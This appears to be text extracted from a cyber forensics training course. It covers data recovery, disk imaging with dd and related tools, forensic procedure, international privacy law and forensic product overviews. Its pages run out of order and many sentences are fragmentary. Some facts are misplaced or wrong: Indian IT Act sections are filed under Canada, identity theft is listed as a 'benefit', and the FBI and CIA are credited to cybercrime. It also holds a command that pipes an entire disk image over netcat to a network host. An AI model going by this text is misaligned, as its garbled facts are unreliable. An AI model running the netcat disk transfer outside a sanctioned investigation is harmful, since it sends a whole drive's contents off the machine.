Manage the Recycle Bin If you want to modify how much space Windows used to store deleted files for all drives or independently, you can rightclick on the Recycle Bin icon and click Properties. In the Recycle Bin Properties window, you can adjust how much space the Recycle Bin takes by dragging the slider left to right, or completely disable the Recycle Bin feature.
Empty the Recycle Bin To empty the Recycle Bin, rightclick the Recycle Bin icon then click Empty Recycle Bin.
How to know the empty recycle bin When the Recycle Bin is empty it shows an icon of a Recycle Bin with no trash. An icon with trash when it is still full. Also, when empty, the message "This folder is empty" is shown when you open the Recycle Bin. Should I empty the Recycle Bin ? If you feel that none of the files in the Recycle Bin will ever need to be restored, it′s recommended you empty the Recycle Bin at your convince.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/5.html Page 116 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
When should I empty the Recycle Bin ? Anytime you want to clean the contents of your hard drive or when you′re running out of disk space it′s recommended you empty the Recycle Bin.
View recover files from the Recycle Bin To view recover files from the recycle bin. Just use the right click of the mouse.
Recovering a deleted file from the Windows Recycle Bin Get to the Desktop where you can see the Recycle Bin icon. If there is any files in the Recycle Bin the icon should appear with trash in the Bin. Just click the icon, and then move. Doubleclick the Recycle Bin icon to open the window displaying all files in the Recycle Bin. If no files are seen skip to the below paragraph. To restore any of the deleted items you can follow any of the steps below. Highlight the files you want to restore, right click the file and then select the Restore option. This will restore the file from the original location it was deleted.
Trash Trash (computing) is a way. By which operating systems dispose of unwanted files. Called a "Recycle Bin" on Microsoft Windows. Trash (video game), an RTS with the capacity for multiplayer. It matches of up to 32 players to compete on a single map.
Implementations Mac OS and Mac OS X, with Macintosh Finder, as "Trash" (or Wastebasket in defunct localizations). Microsoft Windows, with Windows Explorer, as "Recycle Bin". GNOME (Linux), with Nautilus. KDE (Linux), with Konqueror and Dolphin. Xfce (Linux), with Thunar. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/5.html Page 117 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
IN Microsoft Windows By rightclicking on a file and then selecting delete from the menu. Selecting the file and then pressing the delete key. Selecting delete from the Task pane in Windows XP. Selecting the file and choosing delete from the File menu (in Windows XP Explorer). By dragging and dropping a file into the Recycle Bin icon. From the Send To menu. From a context menu command or some other function in a software application. It is usually configurable.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/5.html Page 118 of 135
3/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Compressing Recovered Files
This Linux partition recovery software provides option to save the recovered files in a compressed ZIP folder. With this option of the software, you can either compress each file individually or compress files into a single ZIP folder.
Bonus Tools Stellar Linux Data Recovery software provides few useful utilities as bonus tools, which can be immensely helpful in protecting your precious data against any impending drive failure.
Disk Imaging The software provides a useful option to create image. It also save the image file of your hard disk or any selected volume. The image file of your media can help you recover all your precious data, in case of volume corruption, deletion, or formatting of the media.
Drive Cloning With Stellar Linux Data Recovery, you can create an exact replica of your hard drive which can help you recover lost data, in case of drive failure. Even, with the cloned copy of your hard drive, you can carry on your ongoing works. It can do without any delay over data recovery.
SMART With the ′SMART′ feature, the software continuously monitors important parameters of the hard drive. It generates warning messages against any impending drive failure. Smart helps you protect your data from instances of unexpected hard drive failure.
Recover the deleted files Open Stellar Phoenix Linux recovery software. You can see all the drives physically connected to the system in the left hand panel. You will also be able to see logical drives under this section of the software. Double click on the logical drive from which you want to recover the deleted data. Then click on ′Deleted File Recovery′ icon.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/6.html Page 119 of 135
1/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
The software will scan and display all the recoverable files in the tree view. Now, check mark the files that you want to recover and click on ′Recover Selected′ Icon or Select ′Recover. Selected′ from the File menu. Select the destination folder where you want to save the recovered files. Make sure do not recover the files on the same drive from which you want to recover the data. Then click ′OK′
Receive a data from pen drive Open Stellar Phoenix Linux Data Recovery software. You can see all the drives physically connected to the system in the left hand panel. You will also be able to see logical drives under this section of the software. Double click on the logical drive from which you want to recover the formatted data. Click on ′Advance Scan′ icon. The software will scan and display all the recoverable files in the tree view. Now, click on ′Recover All′ Select the destination folder where you want to save the recovered files. Make sure do not recover the files on the same drive from which you want to recover the data. Then click ′OK′.
Recover data from deleted partition Open Stellar Phoenix Linux Data Recovery software. You can see all the drives physically connected to the system in the left hand panel. You will also be able to see logical drives under this section of the software. Double click on the physical disk displayed in the left pane of the software. Click the first icon i.e. Search for logical drives. Then Select ′Advance Search′. As soon as you click the icon, the software will start searching for the lost logical drives. When searching is complete, all the lost drives in the disk will appear in the left pane in tree view under physical disk.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/6.html Page 120 of 135
2/3
Standard Operating AcquiringProcedures: Data, Duplicating DigitalData, Forensic and Recovering Laboratory Accreditation Deleted files Standards 8/17/2015
scorm content
Then Double click on the standard/advance drive from which you have to recover the lost data. Then click on ′Advance Scan′ icon. The software will scan and display all the recoverable files in the tree view. Now, click on ′Recover All′ Then select the destination folder where you want to save the recovered files. Make sure do not recover the files on the same drive from which you want to recover the data. Then click ′OK′.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit7/assets/6.html Page 121 of 135
3/3
UNIT - 8 Forensic Discovery and Analysis Using Back Track
Page 122 of 135
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Introduction to Forensic tools
The following are the main forensic tools. Imageacquiring tools dd The other main forensic tools are, dd_rescue dcfldd Aimage Afconvert Afinfo Afcat
Imageacquiring tools These tools are aimed at taking an exact replica/image (bitbybit) of the digital media. It is taken to identify for forensic investigation. It is taken without altering the content of the media at all. Acquiring an image of the suspected media helps analyse the media on a highend workstation. It can fulfill the resource requirements of extensive forensic analysis tools. It also working with an image keeps the original media undisturbed and unaltered by any of the analysis activity.
Some important imageacquiring tools Here is a list of some of the important imageacquiring tools available in Backtrack. dd is the popular Linux commandline. It is used for taking images of digital media. They are such as a hard drive, CDROM drive, USB drive, etc., They are also a particular partition of the media.
Raw images Images created using ddlike utilities are called raw images. These are bitbybit copies of the source media. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/2.html Page 123 of 135
1/3
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
They are without any additions or deletions.
Examples of dd dd if=/dev/sdc of=image.dd dd if=/dev/sdc1 of=image1.dd The first example is dd if=/dev/sdc of=image.dd It takes the image of the whole disk. It includes (sdc), the boot record. It also has partition table. The second example isdd if=/dev/sdc1 of=image1.dd It takes the image of a particular partition (sdc1) of the disk (sdc). A partition image can be mounted via the loop device.
dd Also, instead of storing the image contents in a file, you can pipe the data to a host on the network by using tools such as nc; This is useful when you have space constraints for the image file. dd if=/dev/sdc | nc 192.168.0.2 6000 In this example, the contents of the image file are sent via TCP port 6000 to the host 192.168.0.2, where you can run nc in listening mode as nc l 6000 > image.dd to store the received image contents in the file image.dd.
Limitations of dd However, dd has limitations in cases where the media to be imaged has errors in the form of bad sectors. Thus, a more advanced version of dd, named dd_rescue, is available in Back Track. It isused to image a drive that’s suspected to have one or more bad sectors.
Aimage Aimage is an advanced forensics format (AFF) imaging tool with intelligent error recovery, compression and verification. AFF is an extensible open format for the storage of disk images. It is related forensic metadata.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/2.html Page 124 of 135
2/3
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
The ability to store relevant metadata such as the serial number of the drive, date of imaging, etc., inside the image itself, is a huge advantage, It is not possible with raw imaging tools such as dd.
Afcat Afcat is a commandline utility. It prints the various contents of an AFF image file. Basic usage is afcat . p — Output data of page number . S — Output data of sector (sector size 512 bytes). l — Output all segment names. L — Output all segment names, arg and segment length.
AIR Imager AIR (Automated Image and Restore) . AIR Imager is a GUI frontend for dd/dcfldd, It offers the features: Use of either dd or dcfldd. Autodetection of IDE and SCSI drives, CDROMs and tape drives. Image compression via gzip/bzip2 Image verification via MD5 or SHA1. Imaging over a TCP/IP network. Splitting images into multiple files. Write zeros to a drive/partition. Creating a large image file filled with zeros. Customization of source and destination devices/files. Skipping of certain bytes of source and destination.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/2.html Page 125 of 135
3/3
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Introduction of forensic analysis
Forensic analysis is the use of controlled and documented analytical and investigative techniques to identify, collect, examine and preserve digital information.
Forensic analysis Secure State provides a thorough approach to the forensic methodology, and ensures all tools, methodologies and processes are forensically sound it is unaltered. Secure State works as an extension of the corporation’s response team. It help ensure relevant and efficient analysis for three primary areas of forensics: Evidence Acquisition, Evidence Analysis, and Evidence Reporting.
Forensic Acquisition process Computer Forensics Acquisition is the process of acquiring electronic evidence in a manner. It preserves the data and maintains chain of custody. Secure State establishes tested and proven acquisition methodologies, Information gathering and Structured reporting of security related events. Electronic evidence contains the information needed to understand how the events happened, resources or data that may have been affected and mitigation strategies. It is essential that electronic evidence is acquired in a methodical, safe, and Secure manner.
Collecting evidence All evidence collection procedures are reviewed by Secure State’s Incident Response Team. It will be done before acquisition begins. It is an important step. It is also give a shape for forensic analysis. As deemed appropriate, Secure State is the custodian of data and the handler for response, evidence collection and retention, and data or device analysis. All imaging, data collection and documentation will be observed and supervised by a Secure State Lead Investigator.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/3.html Page 126 of 135
1/2
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Primary scope The primary scope for Forensic analysis is to identify unauthorized or anomalous indicators that exist (past or present), how they were deployed, and what capabilities they might have had on the system. After identifying if a successful compromise or malicious software exists, secure State’s primary focus would be directed at determining applicable next steps relating to regulatory or legal compliance, as well as business impact and risk. Applicable next steps would involve Additional forensic acquisition and documentation, collecting and identifying the initial intent of the compromise, remediation, and determining if any private, regulatory or sensitive data was captured or modified.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/3.html Page 127 of 135
2/2
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Documenting and Recording Process
All details, facts and processes will be documented as soon as the Response Team begins analysis on a potential incident or forensic investigation. Secure State will incorporate appropriate media for logging the incident process such as host records, tagging and Labeling systems. Every step taken from the time the incident was detected and recorded to its resolution will be documented, time stamped, reviewed, and signed by the incident handler. Since documentation is an ongoing process throughout the examination, it is vital to be complete, accurate, and comprehensive during the reporting process. Secure State will safeguard data related to incidents since it will contain sensitive system or personnel information, data on exploited vulnerabilities, or information that may be needed for law enforcement. To reduce the risk of sensitive information being disclosed, secure state ensures that access to incident data is restricted and properly stored. In accordance with applicable policies, rules, regulation, or other governing requirements, secure state is responsible for the secure and timely delivery of its investigation reports and all other reports required in accordance with the Incident Response Policies.
Accuracy Many forensic techniques developed in crime labs to aid investigators. They research into their limits or scientific validity was never a priority. Except for DNA, no method has been shown to be able to consistently. It accurately link a piece of evidence to an individual or single source.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/4.html Page 128 of 135
1/1
Forensic Discovery and Analysis Using Back Track 8/17/2015
scorm content
Forensic analysts
Forensic analysts work within the justice system, it provides key evidence to criminal investigations. Within the field of forensics there are six general areas of study including, crime laboratory analyst, medical examiner, crime scene examiner, forensic engineer, technical assistance and academic assistance. The main job of all forensic analysts is to help investigators solve crimes. It is an important help to the investigator to identify the criminal.
Responsibilities of forensic analyst The responsibilities of a forensic analyst include classifying and performing tests on specific pieces of evidence lifted from a crime scene. This evidence may include hair, fibers, tissue, and fire arms.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit8/assets/5.html Page 129 of 135
1/1
UNIT - 9 Privacy and Cyber Forensics
Page 130 of 135
Privacy and Cyber Forensics 8/17/2015
scorm content
Privacy law
It refers to the laws which deal with the regulation of personal information about individuals which can be collected by governments and other public as well as private organizations and its storage and use.
Classification of Privacy law The privacy law is classified as two types. They are as follows; General privacy laws Specific privacy laws
General privacy laws General privacy law is one of the privacy law. They have overall bearing on the personal information of individuals. They affect the policies that govern many different areas of information.
Specific privacy laws These laws are designed to regulate specific types of information. Some examples include: Health privacy laws Financial privacy laws Online privacy laws Communication privacy laws Information privacy laws
Privacy laws In Australia The current state of privacy law in Australia includes, Federal and state information privacy legislation, some sectorspecific privacy legislation at state level, regulation of the media and some criminal sanctions. The Australian Law Reform Commission recommended the enactment of a statutory cause of action for invasion of privacy.
Privacy laws In Brazil A Brazilian citizen′s privacy is protected by the country′s constitution, which states: The intimacy, private life, honor and image of the people are inviolable, with assured right to indention by material or moral damage resulting from its violation.
Privacy laws In Canada file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/2.html Page 131 of 135
1/3
Privacy and Cyber Forensics 8/17/2015
scorm content
In Canada, the federal Personal Information Protection and Electronic Documents Act (PIPEDA) governs the collection, use and disclosure of personal information in connection with commercial activities and personal information about employees of federal works, undertakings and businesses. It generally does not apply to noncommercial organizations or provincial governments. Personal information collected, used and disclosed by the federal government. Previously, the Information Technology (Amendment) Act, added the following two sections relating to Privacy: Section 43A, which deals with implementation of reasonable security practices for sensitive personal information. It provides for the compensation of the person affected by wrongful loss or wrongful gain. Section 72A, which provides for imprisonment for a period up to 3 years or a fine up to Rs. 5,00,000 for a person.
Privacy laws In Mexico In July 5, 2010, Mexico passed a new privacy package focused on treatment of personal data by private entities. The key elements included where: Requirement of all private entities who gather personal data to publish their privacy policy in accordance to the law. Set fines for up to $16,000,000 MXN in case of violation of the law. Set prison penalties to serious violations.
Privacy laws In New Zealand In New Zealand, the Privacy Act 1993 sets out principles in relation to the collection, use, disclosure, security. It also in relation to access the personal information. The introduction into the New Zealand common law of a tort covering invasion of personal privacy. Complaints about privacy are considered by the Privacy Commissioner.
Privacy laws In Republic of China (Taiwan) Computer Processed Personal Information Protection Act was enacted in 1995 in order to protect personal information processed by computers. The general provision specified the purpose of the law, defined crucial terms, prohibited individuals from waiving certain rights.
Privacy laws In Russia file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/2.html Page 132 of 135
2/3
Privacy and Cyber Forensics 8/17/2015
scorm content
Data protection principles and legislation in the Russian Federation (in English). Online database of the Russian laws (in Russian). Federal Service on supervising in the sphere of communications, information technology and mass media (in Russian).
Privacy laws In United Kingdom As a member of the European Convention on Human Rights, the United Kingdom adheres to Article 8 ECHR, which guarantees a "right to respect for privacy and family life" from state parties, subject to restrictions as prescribed by law and necessary in a democratic society towards a legitimate aim.
Privacy laws In United States The right to privacy is not explicitly stated anywhere in the Bill of Rights. The idea of a right to privacy was first addressed within a legal context in the United States. Louis Brandeis (later a Supreme Court justice) and another young lawyer, Samuel D. Warren, published an article called "The Right to Privacy" in the Harvard Law Review in 1890 arguing that the U.S. Constitution and common law allowed for the deduction of a general "right to privacy".
Privacy laws In Greece Taking a picture of a person in a public space: Requires consent. Taking a photo or video of someone or drawing them in a painting constitutes an illegal act by itself according to Article 57 of the Greek Civil Code. The law assumes that consent has been provided silently if the depicted person has been paid for the photography session. The law 2472/1997 also applies in many circumstances, even in photographing. Greece also requires photographers to obtain a government permit before photographing people participating in political protests in public places.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/2.html Page 133 of 135
3/3
Privacy and Cyber Forensics 8/17/2015
scorm content
Constitutional law
Constitutional law is the body of law which defines the relationship of different entities within a State, namely, the executive, the legislature, and the judiciary.
Human rights Human rights or civil liberties form a crucial part of a country′s constitution and govern the rights of the individual against the state. Most jurisdictions, like the United States and France. They have a codified constitution, with a bill of rights.
Legislative procedure Another main function of constitutions may be to describe the procedure by which parliaments may legislate. For instance, special majorities may be required to alter the constitution.
In bicameral legislatures There may be a process laid out for second or third readings of bills before a new law can enter into force. Alternatively, there may further be requirements for maximum terms. That a government can keep power before holding an election.
Study of constitutional law Constitutional law is a major focus of legal studies and research. For example, most law students in the United States are required to take a class in Constitutional Law during their first year. Several law journals are devoted to the discussion of constitutional issues.
The Rule of Law Dicey identified three essential elements of the British Constitution rule of law: Absence of arbitrary power; Equality before the law; The Constitution is a result of the ordinary law of the land.
Legal liability Legal liability is the legal bound obligation to pay debts. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/3.html Page 134 of 135
1/2
Privacy and Cyber Forensics 8/17/2015
scorm content
It utilize the rule of law.
Mistake of law When a party enters into a contract, without the knowledge of the law, the contract is affected by such mistakes But it is not void. A contract is not voidable because it was caused by a mistake. The reason here is that ignorance of law is not an excuse at all.
Mistake of Fact Where both the parties enter into an agreement are under a mistake as to a matter of fact essential to the agreement, the agreement is void.
Common mistake A common mistake is occur in sometimes where both parties hold the same mistaken belief of the facts.
Mistake classification The mistake is classified into two types. They are, Mistake of Law When a party enters into a contract, without the knowledge of the law. Mistake of Fact Where both the parties enter into an agreement.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/3.html Page 135 of 135
2/2
Page 1 of 135
Page 2 of 135
UNIT - 1 Introduction
Page 3 of 135
Introduction 8/17/2015
scorm content
Introduction to Computer forensics
It is the equivalent of surveying a crime scene performing an autopsy on a victim”. forensic means forum or discussion. Forensic science has a seven types of subdivisions. Application of the Computer forensics is involved with all aspects of an investigation. Benefits are concern a wide range of crimes and disputes, such as fraud and theft.
History Forensic roots from a Latin word, “forensic”. It generally means forum or discussion. Any criminal charged with a crime is presented before an assembly of public folks. Both of the complainant and the defendant are to present their sides through their own speeches.
Forensic science subdivisions & Application Forensic pathology – principles of medicine and determine a cause of death or injury. Forensic accounting – study and interpretation of accounting evidence. Forensic anthropology – the recovery and identification of skeletonized human remains. Forensic archaeology – combination of archaeological techniques and forensic science. Forensic chemistry – detection and identification of illicit drugs, accelerants. Forensic DNA analysis – answer forensic questions such as paternity/maternity testing or placing. Entomology – around human remains to assist in determination of time or location of death. Application: Each subdivisions involving with their own conceptualization. Benefits: To work with different situations and concept of cause.
Computer Forensic Time line 1970s First crimes cases involving computers, mainly financial fraud. 1980’s Norton Utilities, “Unerase” tool was created. SEARCH High Tech Crimes training was created. Regular classes began to be taught to Federal agents in California and at FLETC in Georgia. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/2.html Page 4 of 135
1/2
Introduction 8/17/2015
scorm content
Then HTCIA was formed in Southern California. 1984 FBI Magnetic Media Program was created. Later it became as Computer Analysis and Response Team (CART).
Computer Forensic Time line FBI 1987 Access Data – Cyber Forensic Company formed. 1988 Creation of IACIS, the International Association of Computer Investigative Specialists. In 1993 First International Conference on Computer Evidence held. In 1995 International Organization on Computer Evidence (IOCE) was formed. In 1997 The G8 countries in Moscow declared that “Law enforcement personnel must be trained and equipped to address hightech crimes”. In 1998, G8 appointed IICE to create international principles, guidelines and procedures relating to digital evidence. In 1998 INTERPOL Forensic Science Symposium was held. In 1999 FBI CART case load exceeds 2000 cases, examining 17 terabytes of data. In 2000 First FBI Regional Computer Forensic Laboratory was established. In 2003 FBI CART case load exceeds 6500 cases, examining 782 terabytes of data. Benefits: All the versions of computer forensic update were developed with their previous version.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/2.html Page 5 of 135
2/2
Introduction 8/17/2015
scorm content
Computer forensic & Standards
Whenever possible, do not examine the original media. Write protect the original, copy it, and examine only the copy. Use writes blocking technology to preserve the original. Examination results should be reviewed by a supervisor. All hardware and software should be tested to insure they produce accurate and reliable results. Forensic examiners must remain objective at all times. Application: write blocking technology to preserve the original. Benefits: produce accurate and reliable results.
Basic work The following steps are considered as basic work. Preparation Collection Examination Analysis Reporting Process: “Forensic Computing is the process of identifying, preserving, analyzing and presenting digital evidence in a manner that is legally acceptable. What is Collection: The first phase in the process is to identify, label, record, and acquire data from the possible sources of relevant data. Application: Record the acquire data. What is Examination: Examinations involve forensically processing large amounts of collected data using a combination of automated and manual methods to assess and extract data of particular interest. Application: To assess and extract data. What is Analysis: The next phase of the process is to analyze the results of the examination. It is performed by using legally justifiable methods and techniques. This is done to derive useful information that addresses the questions. This information are useful for performing the collection and examination. Application: To derive useful information from examination. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/3.html Page 6 of 135
1/2
Introduction 8/17/2015
scorm content
What is Reporting: The final phase is reporting the results of the analysis. It may include describing the actions used. It has feature of explaining how tools and procedures were selected. Determination of what other actions need to be performed is the key. Providing recommendations for improvement to policies, guidelines, procedures, tools, and other aspects of the forensic process are also part final phase. Application: Providing recommendations for improvement to policies, guidelines, procedures, tools.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/3.html Page 7 of 135
2/2
Introduction 8/17/2015
scorm content
Introduction to Computer Forensics Investigation
Computer Forensics Investigation: Data recovery Password cracking Online investigation Expert testimony
What is cybercrime? The growing list of cybercrimes includes crimes that have been made possible by computers. They are such as network intrusions and the dissemination of computer viruses. It is also computerbased variations of existing crimes, such as identity theft, stalking, bullying and terrorism. Example: Network intrusions. Application: Dissemination of computer viruses. Benefits: Identity theft, stalking, bullying and terrorism.
Computer crime The computer as a target attacking the computers of others (spreading viruses is an example). The computer as a weapon using a computer to commit "traditional crime" that we see in the physical world (such as fraud or illegal gambling). The computer as an accessory using a computer as a "fancy filing cabinet" to store illegal or stolen information. Example: Spreading viruses. Application: To store illegal or stolen information.
Cybercrime Overview Computer crime refers to any crime that involves a computer and a network. The computer may have been used to carry out the crime for example in the case of stalking. It may be the target for example a Virus. Example: stalking. Benefits: To carry out the crime.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/4.html Page 8 of 135
1/3
Introduction 8/17/2015
scorm content
Examples for cybercrime: June 2012 LinkedIn and Harmony had been attacked. Compromising 65 million passwords. Twitter is hacked. 250,000 passwords are leaked.
Cybercrime types Theft of telecommunications services has occurred. Communications channels were attached to create conspiracy. Telecommunications piracy was done many agents. Sales and investment frauds have happened. Electronic funds transfer fraud were happened. Application: Each types involving with their own conceptualization.
Cybercrime Problem The telecommunications was attached by electronic vandalism. It has paved way for terrorism and extortion. The fraud has continued to steal telecommunications services and piracy. Pornography and other offensive material were occurred. The other areas of fraud were occurred in Telemarketing Electronic fund transfer crime and Electronic money laundering
Job Exists On the other hand many useful things were developed. Separate Law Enforcement was established. As part of development the CIA, FBI were created. The Local Police Department and Sheriff were equipped well with modern equipments. Private sector jobs in Information security was created. Separate cyber tech official jobs were created in companies. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/4.html Page 9 of 135
2/3
Introduction 8/17/2015
scorm content
The accounting firm had new jobs in technology field. The law firm had to get more technical people for handling the technical jobs. The top most power filed of any country is Military. It eventually had to field many technology people. They were doing survey using sophisticated equipments. Many intercepting jobs were created.
Qualities of good investigators There are needs of highest level of ethics. One has to be unbiased. One should have good documentation skills. One should be aware of when to call for help. Application: To help for others at a critical times. Benefits: To make awareness.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit1/assets/4.html Page 10 of 135
3/3
UNIT - 2 Cyber Forensics Tools and Utilities
Page 11 of 135
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Introduction to Cyber Forensics tools
There are two types of forensics tools. They are Disk imaging software tools. Software or hardware write tools, Hashing tools and primary tools.
Primary Forensic tools: Primary forensic tools are classified to the following types. This encases from Guidance software primary tool. When Encase falls FTK is the second choice. Xways Software Technology is another type of tool. DFF (Digital Forensics Framework) is another type of tool. It can be used in Linux.
Live Forensics: To make simple live forensic, Linux: from forensic distros. Helix: From efenceCain: From cainelive.net. F – Response from www.fresponse.com. FIM tools from system internals. Great free from for live forensics. Live view from sourceforge.net. Application: which can be used as live forensic and booting linen.
Mobile Devices This includes not only mobile phones. Also PDA, IPOD, Video Cameras, Photo Cameras, MP3 Players, etc. XRY and XACT form are very good. But they are very expensive. Device Seizure form Parable nice for PDA examination.
Data Recovery file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/2.html Page 12 of 135
1/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Advanced recovery needs electronic and mechanical parts replacement. PC3000 from ace laboratory HDD and SSD diagnostics are processed through password resetting. RStudio is the first tool to recover any remaining data. FORMOST from foremost.sourceforge.net.CD/DVD Inspector from infinadye CD/DVD examination.
Data Erasing Standard file erasing keeps data intact. The first rules are tough in forensic classes. Data wiping is one of the solution. DBAN from www.dban.org is easiest way to wipe HDD. ERASER from www.eraser.heidi.ie – simple windows apps is also used for erasing data.
Password Recovery The password recovery toolkit is obtained from accessdata.com. And tools is derived from www.elcomsoft.com.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/2.html Page 13 of 135
2/2
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Coroner′s Toolkit
The Coroner′s Toolkit (or TCT) is a suite of computer security programs. It was discovered by Dan Farmer and wieste Venama. It is used to assist in digital forensic analysis.
ToolkitInstallation Currently the following OS′s are at least semisupported. FreeBSD 24.* Open BSD 2.* BSD/OS 24.* SunOS 45.* Linux 2.* Example: The more recent versions. i.e. after JUNE 24, 2000.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/3.html Page 14 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Encase Forensic
Encase is a suite of digital forensics products by Guidance Software. The software comes in several forms. They are designed for forensic, cyber security and ediscovery use. The company also offers Encase training and certification.
Product Line of encase Encase technology is available within a number of products. It currently includes Encase Forensic, Encase Cyber security, Encase eDiscovery, and Encase Portable. Guidance Software also runs training courses and certification.
Features of Encase forensic Encase contains tools for several areas of the digital forensic process. It has tools for acquisition, analysis and reporting. It also includes a scripting facility called Encrypt with various API′s.
Encase Evidence File Format Encase contains functionality to create forensic images of suspect media. Images are stored in proprietary Encase Evidence File Format. The compressible file format is prefixed with case data information. It consists of a bitbybit (i.e. exact) with CRC hashes for every 64K of data. The file format also appends an MD5 hash of the entire drive as footer. Benefits: To create forensic images of suspect media.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/4.html Page 15 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Analyst′s Notebook
Analyst′s Notebook is a software product. It was produced from i2 Limited and used for data analysis and investigation. It is a part of the Human Terrain System. US Army program which embeds social scientists with combat brigades. An investigation into fraud in the U.S. Army, are reported to have used Analyst′s Notebook capabilities.
i2 Analyst′s Note book: It offers a rich visual analysis designed to help analysts and their organizations. Large sets of disparate information into highquality, intelligence to help many operations. They are aiding to identify, predict and prevent criminal, terrorist and fraudulent activities.
Analyst′s Notebook Benefits: Quickly identify patterns in Data. Otherwise they will get missed using single analytical approaches. Reduce the time to deliver rich, actionable intelligence. Increase the depth of intelligence for more effective result.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/5.html Page 16 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Log Logic′s LX 2000 log analysis tool
Log Logic′s LX 2000 is an excellent log analysis tool. It is powerful and can be distributed. It is a mature and useful product. But it is not for the fainthearted. While its user interface is excellent, it has many hidden capabilities.
Feature log analysis tool Its displays are straightforward. One can perform a wide variety of analyses with relative ease. It is coupled with the ST 3000 largescale storage appliance. The LX 2000 becomes an extremely powerful tool for managing. It is useful for analyzing and archiving huge amounts of data.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/6.html Page 17 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
Net Witness
Net Witness Corporation was a Reston, Virginiabased network security company. It provides realtime network forensics. It also provides automated threat analysis solutions. In 2011, Net Witness was acquired by EMC Corporation.
Net witness Discovered Net witness’ former CEO, Amit Yoran, was formerly Director of the Department of Homeland Security. He was associated with National Cyber Security division. Net Witness also employed Shawn Carpenter. He is a notable security analyst and he has discovered operation Titan Rain in 2005.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit2/assets/7.html Page 18 of 135
1/1
Cyber Forensics Tools and Utilities 8/17/2015
scorm content
About MANDIANT
MANDIANT are Engineers, consultants, authors, instructors & security experts. They had chased criminals who were attacking the Fortune 500, govt. contractors, and multi national bank. They responded to over 1 million compromised systems in over 60 organizations. They find evil & solve crime through our products & services.
Network Analysis Identify activities in near RealTime. Detect and collect known malicious network traffic. Perform post Processing and decryption. Describe Attackers Activities and Movement. Determine intent and process of compromise.
Autopsy Autopsy is a user interface. It makes simpler to deploy many of the open source programs. It also can be used in plugins of the Sleuth Kit collection.
Tool design principles The tool should be Extensible Frameworks Ease of Use
